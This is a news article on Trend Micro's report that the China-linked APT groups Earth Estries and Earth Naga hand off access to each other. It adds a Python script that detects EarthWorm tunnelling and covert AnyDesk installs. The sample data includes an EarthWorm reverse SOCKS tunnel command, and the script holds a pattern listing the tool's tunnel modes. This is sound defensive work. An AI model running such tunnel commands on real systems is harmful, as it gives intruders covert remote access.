China-linked advanced persistent threat (APT) groups are joining forces, bringing cyber espionage to a new level of coordination in a trend Trend Micro Research describes as “Premier Pass-as-a-Service”: multiple APT groups share access, information and resources, which makes attribution of an intrusion harder.
In particular, Trend Micro has observed such collaboration between two China-linked groups: Earth Estries and Earth Naga (also tracked as Flax Typhoon, RedJuliett, and Ethereal Panda). According to the researchers, Earth Estries handed compromised systems over to Earth Naga, so what first looked like a single intrusion was actually a coordinated handoff between the two groups.
Earth Estries has mainly targeted telecommunications and government sectors in the US, Asia-Pacific, and the Middle East, and has recently expanded into South America and South Africa. Earth Naga, active since at least 2021, focuses on government, military, technology, and academic organizations, especially in Taiwan, but also targets NATO and Latin American countries.
Trend Micro believes Earth Estries may act as an access broker, breaking into systems and then passing that access to other groups. Specifically, in a November 2024 breach of a mobile retailer in the Asia-Pacific region and a March 2025 intrusion at a Southeast Asian government agency, Earth Estries appears to have provided the initial entry points that Earth Naga later used.
The 2025 incident involved multiple malware families, including CrowDoor, ShadowPad, Cobalt Strike, and Draculoader, as well as legitimate tooling repurposed to hide activity: the AnyDesk remote-administration client and the EarthWorm tunnelling tool. Trend Micro says it found evidence that both groups shared infrastructure and possibly coordinated their operations.
Later in 2025, Earth Estries was also seen exploiting a Citrix NetScaler ADC and Gateway flaw (CVE-2025-5777) and continuing to attack network edge devices from Ivanti, Cisco, and other vendors.
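Detection logic for the two legitimate tools named above, as an added example that is not Trend Micro's code and does not come from the report: it runs two rules over Sysmon-style process-creation events serialized as newline-delimited JSON. The EarthWorm mode names and the AnyDesk unattended-install switches are the tools' own; the event field names (Computer, Image, CommandLine), the list of trusted AnyDesk directories and the sample events are assumptions constructed for this example.

```python
import json
import re
from dataclasses import dataclass

# EarthWorm (ew) is frequently renamed by intruders, so the rule keys on its
# argument grammar ("-s <mode>") rather than on the executable name. The mode
# names are EarthWorm's own.
EARTHWORM_MODES = ("ssocksd", "rcsocks", "rssocks", "lcx_listen", "lcx_tran", "lcx_slave")
EARTHWORM_RE = re.compile(r"(?:^|\s)-s\s+(" + "|".join(EARTHWORM_MODES) + r")(?:\s|$)")

# Directories from which a sanctioned AnyDesk installation would run.
# Assumption for this example: adjust to the environment's deployment policy.
ANYDESK_TRUSTED_DIRS = (
    "c:\\program files (x86)\\anydesk\\",
    "c:\\program files\\anydesk\\",
)
# AnyDesk's documented switches for an unattended (silent) installation.
ANYDESK_SILENT_FLAGS = {"--install", "--silent", "--start-with-win"}


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    command_line: str


def check_event(event: dict) -> list[Finding]:
    """Apply both rules to one process-creation event (Sysmon-style field names)."""
    host = event.get("Computer", "?")
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    exe = image.rsplit("\\", 1)[-1]
    findings: list[Finding] = []

    # Rule 1: an EarthWorm tunnel being set up, whatever the binary is called.
    m = EARTHWORM_RE.search(cmd)
    if m:
        findings.append(Finding(host, f"earthworm_tunnel:{m.group(1)}", cmd))

    # Rule 2: AnyDesk launched from outside the sanctioned install path, or
    # installed unattended (the pattern an intruder uses to keep access).
    if exe == "anydesk.exe":
        if not any(image.startswith(d) for d in ANYDESK_TRUSTED_DIRS):
            findings.append(Finding(host, "anydesk_untrusted_path", cmd))
        if set(cmd.lower().split()) & ANYDESK_SILENT_FLAGS:
            findings.append(Finding(host, "anydesk_silent_install", cmd))
    return findings


def scan(lines) -> list[Finding]:
    """Run check_event over newline-delimited JSON events, skipping malformed lines."""
    findings: list[Finding] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(check_event(event))
    return findings


# Constructed sample telemetry (not real incident data): one sanctioned AnyDesk
# launch, one unattended install from a world-writable directory, one renamed
# EarthWorm reverse SOCKS tunnel, and one benign command.
SAMPLE_EVENTS = [
    {"Computer": "ws01", "Image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe",
     "CommandLine": "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\""},
    {"Computer": "srv07", "Image": "C:\\Users\\Public\\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --install \"C:\\Users\\Public\\AnyDesk\" --start-with-win --silent"},
    {"Computer": "srv07", "Image": "C:\\Windows\\Temp\\svchost.exe",
     "CommandLine": "svchost.exe -s rssocks -d 203.0.113.10 -e 8888"},
    {"Computer": "ws02", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.host:6} {f.rule:28} {f.command_line}")
```

The EarthWorm rule deliberately ignores the image name: a renamed copy (here masquerading as svchost.exe in a temp directory) still has to pass the tool its mode and port arguments, so matching on the command line survives the rename while matching on a file hash or filename does not. The AnyDesk rule is only as good as the trusted-directory list, which should mirror how the organization actually deploys the client.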
“The threat landscape is increasingly shaped by sophisticated, multi-group intrusions, as demonstrated by the collaborative operations between Earth Estries and Earth Naga. Defenders must adopt vigilant and multi-layered security strategies to counter risks such as suspicious file deployments, unauthorized remote administration, and targeted attacks on edge devices,” Trend Micro researchers noted.
